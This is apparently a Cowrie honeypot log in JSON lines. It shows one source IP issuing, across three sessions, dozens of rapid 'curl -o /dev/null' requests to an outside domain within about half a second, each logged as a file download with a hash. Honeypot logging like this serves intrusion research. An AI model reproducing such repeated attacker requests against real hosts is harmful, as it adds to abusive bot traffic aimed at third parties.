{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.571292Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.600814Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.605675Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.606947Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.607754Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.610978Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.612723Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.614475Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.615544Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.646909Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.648754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.651166Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.651967Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.656015Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.656847Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.658583Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.659471Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.693754Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.696034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.697253Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.698303Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.701552Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.702445Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.705605Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.706568Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.710516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.714900Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.718356Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.721689Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.751933Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.753783Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.755226Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.756112Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.759866Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.761592Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.762464Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.764303Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.765168Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.802888Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.803662Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.807246Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.808000Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.812114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.814533Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.815301Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.845817Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.847799Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.850512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.852990Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.854091Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.854793Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.857991Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.858746Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.860160Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.860724Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.889412Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.919481Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.920957Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.921810Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.926259Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.928997Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.929937Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.936369Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.937271Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.964213Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.965332Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.965843Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.968596Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.969186Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.971857Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.974556Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:38.976799Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:38.977474Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.003400Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.005417Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.006906Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.007450Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.011903Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.012667Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.014715Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.015651Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
